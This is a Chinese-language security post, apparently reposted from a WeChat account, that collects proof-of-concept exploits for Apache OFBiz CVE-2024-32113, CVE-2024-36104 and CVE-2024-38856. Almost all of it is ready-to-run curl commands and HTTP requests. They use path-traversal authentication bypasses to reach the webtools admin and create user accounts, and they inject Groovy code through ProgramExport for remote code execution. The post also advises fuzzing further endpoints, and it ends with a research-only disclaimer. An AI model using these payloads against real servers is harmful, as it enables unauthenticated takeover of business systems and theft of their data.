Apache OfBiz 漏洞
CVE-2024-32113 的 POC
USERNAME和参数PASSWORD可以在/ecomseo/AnonContactus界面上提供,任何人都可以公开访问。
-
POC1:远程代码执行
curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport'--header 'User-Agent: Apifox/1.0.0 (https://apifox.com)'--header 'Accept: */*'--header 'Host: 127.0.0.1:8443'--header 'Connection: keep-alive'--header 'Content-Type: application/x-www-form-urlencoded'--data-urlencode '[email protected]'--data-urlencode 'JavaScriptEnabled=Y'--data-urlencode 'PASSWORD=12345'--data-urlencode 'groovyProgram=println (('''tou''' + '''ch /tmp/success''').execute().text);'
-
POC2:可以绕过登录来访问受限制的webtools管理界面。
curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/login/'--header 'User-Agent: Apifox/1.0.0 (https://apifox.com)'--header 'Accept: */*'--header 'Host: 127.0.0.1:8443'--header 'Connection: keep-alive'--header 'Content-Type: application/x-www-form-urlencoded'--data-urlencode '[email protected]'--data-urlencode 'PASSWORD=12345'--data-urlencode 'JavaScriptEnabled=Y'
-
POC3:可以注册一个普通用户账号,userLoginId作为用户名。
curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/createUserLogin'--header 'User-Agent: Apifox/1.0.0 (https://apifox.com)'--header 'Accept: */*'--header 'Host: 127.0.0.1:8443'--header 'Connection: keep-alive'--header 'Content-Type: application/x-www-form-urlencoded'--data-urlencode '[email protected]'--data-urlencode 'PASSWORD=12345'--data-urlencode 'JavaScriptEnabled=Y'--data-urlencode 'enabled=Y'--data-urlencode 'partyId='--data-urlencode 'userLoginId=30000'--data-urlencode 'currentPassword=12345'--data-urlencode 'currentPasswordVerify=12345'--data-urlencode 'passwordHint='--data-urlencode 'requirePasswordChange=N'--data-urlencode 'securityQuestion='--data-urlencode 'SecurityAnswer='--data-urlencode 'externalAuthId='
CVE-2024-36104 的 POC
-
RCE1
curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport'--header 'User-Agent: Apifox/1.0.0 (https://apifox.com)'--header 'Accept: */*'--header 'Host: 127.0.0.1:8443'--header 'Connection: keep-alive'--header 'Content-Type: application/x-www-form-urlencoded'--data-urlencode '[email protected]'--data-urlencode 'JavaScriptEnabled=Y'--data-urlencode 'PASSWORD=12345'--data-urlencode 'groovyProgram=println (('''tou''' + '''ch /tmp/success''').execute().text);'
-
RCE2
curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport'--header 'User-Agent: Apifox/1.0.0 (https://apifox.com)'--header 'Accept: */*'--header 'Host: 127.0.0.1:8443'--header 'Connection: keep-alive'--header 'Content-Type: application/x-www-form-urlencoded'--data-urlencode '[email protected]'--data-urlencode 'JavaScriptEnabled=Y'--data-urlencode 'PASSWORD=12345'--data-urlencode 'groovyProgram=println (('''tou''' + '''ch /tmp/success''').execute().text);'
CVE-2024-38856 的 POC
-
远程代码执行
POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 127.0.0.1:8443groovyProgram=throw+new+Exception('id'.execute().text);
PS:forgotPassword可以替换成其他请求,可以尝试在 中搜索webapp/webtools/WEB-INF/controller.xml(如图)进行fuzzing,只要请求成功返回success,就可以触发ProgramExport模块中的RCE。
https://github.com/RacerZ-fighting/CVE-2024-32113-POC原文始发于微信公众号(Ots安全):Apache OfBiz CVE-2024-32113和CVE-2024-36104 漏洞 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论